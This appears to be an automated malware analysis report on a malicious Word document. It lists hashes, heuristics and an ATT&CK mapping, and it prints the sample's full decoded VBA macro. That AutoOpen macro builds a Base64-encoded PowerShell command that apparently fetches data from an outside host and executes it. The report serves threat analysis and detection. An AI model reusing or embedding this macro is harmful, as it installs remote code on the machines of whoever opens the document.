Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f6800be258d5c9b…

MALICIOUS

Office (OLE)

Size: 267.5 KB
Created: 2018-02-22 14:58:00
Authoring application: Microsoft Office Word
First seen: 2018-03-04
MD5: 7a3716ff4ce9914713d760da55bb6fd7
SHA-1: bb65f21241e9bf00cbae1fac0f0e0baa934ab056
SHA-256: 4f6800be258d5c9b2789ba10587cf1cb937c6a849f0585cacc51c97edd790aca
Risk Score: 110

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro constructs a string that appears to be a Base64 encoded command, likely intended for execution via PowerShell. The macro uses string concatenation and an array of characters to build the command, which is then likely decoded and executed. The specific command is too obfuscated to fully reconstruct, but the presence of 'System.Text.Encoding' and 'ToBase64String' suggests a decoding operation.

Heuristics (5)

  • VBA macros detected (severity: medium; 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
        ET_QJ = ET_QJ + BR_TF
        Shell$ ET_QJ
    End Sub
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
    Attribute VB_Name = "remi"
    Sub AutoOpen()
        Dim ET_QJ As String
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5896 bytes
SHA-256: d3108f6d07df4ddc4dea470985aeb78fa7746fc7103c8045edc265ccf6793645

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "remi"
Sub AutoOpen()
    Dim ET_QJ As String
    IQ_KC = Array("p", "o", "l", "-", "r", " ", "s", "u", "x", "i", "d", "h", "y", "e", "w", "t", "n", "b", "a", "c")
    Dim AM_SJ As String
    AM_SJ = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    ET_QJ = ET_QJ + IQ_KC(0)
    ET_QJ = ET_QJ + IQ_KC(1)
    Dim HO_TE As String
    HO_TE = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVAB"
    ET_QJ = ET_QJ + IQ_KC(14)
    ET_QJ = ET_QJ + IQ_KC(13)
    Dim BT_PI As String
    BT_PI = "lAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBV"
    ET_QJ = ET_QJ + IQ_KC(4)
    ET_QJ = ET_QJ + IQ_KC(6)
    Dim JL_PG As String
    JL_PG = "AFQARgA4AC4ARwBlAHQAUwB0"
    ET_QJ = ET_QJ + IQ_KC(11)
    ET_QJ = ET_QJ + IQ_KC(13)
    Dim HS_TE As String
    HS_TE = "AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
    BR_TF = BR_TF & AM_SJ & HO_TE & BT_PI & JL_PG & HS_TE
    ET_QJ = ET_QJ + IQ_KC(2)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim CL_NC As String
    CL_NC = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdA"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim EK_MJ As String
    EK_MJ = "ByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
    ET_QJ = ET_QJ + IQ_KC(14)
    ET_QJ = ET_QJ + IQ_KC(9)
    Dim IO_SB As String
    IO_SB = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8A"
    ET_QJ = ET_QJ + IQ_KC(16)
    ET_QJ = ET_QJ + IQ_KC(10)
    Dim AS_QF As String
    AS_QF = "awBlAC0AdwBlAGIAcg"
    ET_QJ = ET_QJ + IQ_KC(1)
    ET_QJ = ET_QJ + IQ_KC(14)
    Dim JK_RC As String
    JK_RC = "BlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABz"
    BR_TF = BR_TF & CL_NC & EK_MJ & IO_SB & AS_QF & JK_RC
    ET_QJ = ET_QJ + IQ_KC(6)
    ET_QJ = ET_QJ + IQ_KC(15)
    Dim CN_SB As String
    CN_SB = "ADoALwAvAHUAcwBwAHIAZAA1A"
    ET_QJ = ET_QJ + IQ_KC(12)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim ER_QG As String
    ER_QG = "DEANQAwAGMAZQBuAHQAcgBhAGwALg"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim EN_OF As String
    EN_OF = "B0AGEAYgBsAGUALgBjA"
    ET_QJ = ET_QJ + IQ_KC(11)
    ET_QJ = ET_QJ + IQ_KC(9)
    Dim IT_MB As String
    IT_MB = "G8AcgBlAC4AdwBpAG4AZ"
    ET_QJ = ET_QJ + IQ_KC(10)
    ET_QJ = ET_QJ + IQ_KC(10)
    Dim CQ_RI As String
    CQ_RI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8A"
    BR_TF = BR_TF & CN_SB & ER_QG & EN_OF & IT_MB & CQ_RI
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(16)
    Dim DR_NE As String
    DR_NE = "dQBzAGUAPwAkAGYAaQBsAHQA"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim AK_KF As String
    AK_KF = "ZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQ"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(8)
    Dim DT_RC As String
    DT_RC = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwA"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(19)
    Dim HP_TB As String
    HP_TB = "mACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB2"
    ET_QJ = ET_QJ + IQ_KC(7)
    ET_QJ = ET_QJ + IQ_KC(15)
    Dim GT_PE As String
    GT_PE = "AD0AMgAwADEANwAtADAANA"
    BR_TF = BR_TF & DR_NE & AK_KF & DT_RC & HP_TB & GT_PE
    ET_QJ = ET_QJ + IQ_KC(9)
    ET_QJ = ET_QJ + IQ_KC(1)
    Dim IN_QI As String
    IN_QI = "AtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBzAHIA"
    ET_QJ = ET_QJ + IQ_KC(16)
    ET_QJ = ET_QJ + IQ_KC(0)
    Dim AN_SD As String
    AN_SD = "dAA9AHM"
    ET_QJ = ET_QJ + IQ_KC(1)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim FR_QD As String
    FR_QD = "AYwBvACYAcwBwAD0AcgB"
    ET_QJ = ET_QJ + IQ_KC(9)
    ET_QJ = ET_QJ + IQ_KC(19)
    Dim FK_RD As String
    FK_RD = "3AGQAbABhAGMAdQBwACY"
    ET_QJ = ET_QJ + IQ_KC(12)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim JK_QC As String
    JK_QC = "AcwBlAD0AMgAwADEANwAtADEAMAAtADAAN"
    BR_TF = BR_TF & IN_QI & AN_SD & FR_QD & FK_RD & JK_QC
    ET_QJ = ET_QJ + IQ_KC(17)
    ET_QJ = ET_QJ + IQ_KC(12)
    Dim FM_OG As String
    FM_OG = "gBUADIAMgA6ADQAMQA6ADEAMgBaAC"
    ET_QJ = ET_QJ + IQ_KC(0)
    ET_QJ = ET_QJ + IQ_KC(18)
    Dim AQ_OF As String
    AQ_OF = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADIA"
    ET_QJ = ET_QJ + IQ_KC(6)
    ET_QJ = ET_QJ + IQ_KC(6)
    Dim IP_NG As String
    IP_NG = "OABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQBoAHQ"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim HN_TC As String
    HN_TC = "AdABwAHMAJgBzAGkA"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim AR_TD As String
    AR_TD = "ZwA9AHQAegBQADcAYwA4AHgAWgBoAHIAMQBzAGI"
    BR_TF = BR_TF & FM_OG & AQ_OF & IP_NG & HN_TC & AR_TD
    Dim HQ_MF As String
    HQ_MF = "AdgB4ADkAZgBKA"
    Dim GT_LB As String
    GT_LB = "FMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEIAbg"
    Dim FQ_QH As String
    FQ_QH = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0AC"
    Dim HN_TJ As String
    HN_TJ = "UAMwBEACcAIAAtAEgAZQBhAGQA"
    Dim FK_NA As String
    FK_NA = "ZQByAHMAIABAAHsAJwBBA"
    BR_TF = BR_TF & HQ_MF & GT_LB & FQ_QH & HN_TJ & FK_NA
    Dim JQ_RD As String
    JQ_RD = "GMAYwBlAHAAdA"
    Dim DS_QJ As String
    DS_QJ = "AnAD0AJwBBAHAAcABsA"
    Dim HR_QB As String
    HR_QB = "GkAYwBhA"
    Dim BK_NI As String
    BK_NI = "HQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABl"
    Dim AS_PD As String
    AS_PD = "AG4AdAAgAHwAIABDAG"
    BR_TF = BR_TF & JQ_RD & DS_QJ & HR_QB & BK_NI & AS_PD
    Dim HS_KH As String
    HS_KH = "8AbgB2AGUAcgB0AEYAcg"
    BR_TF = BR_TF & HS_KH
    Dim HQ_SF As String
    HQ_SF = "BvAG0ALQBKAHMAbwBuACkALgB2AGEA"
    BR_TF = BR_TF & HQ_SF
    Dim JN_NJ As String
    JN_NJ = "bAB1AGUALgBkAGEAdABhACkAKQA="
    BR_TF = BR_TF & JN_NJ
    ET_QJ = ET_QJ + BR_TF
    Shell$ ET_QJ
End Sub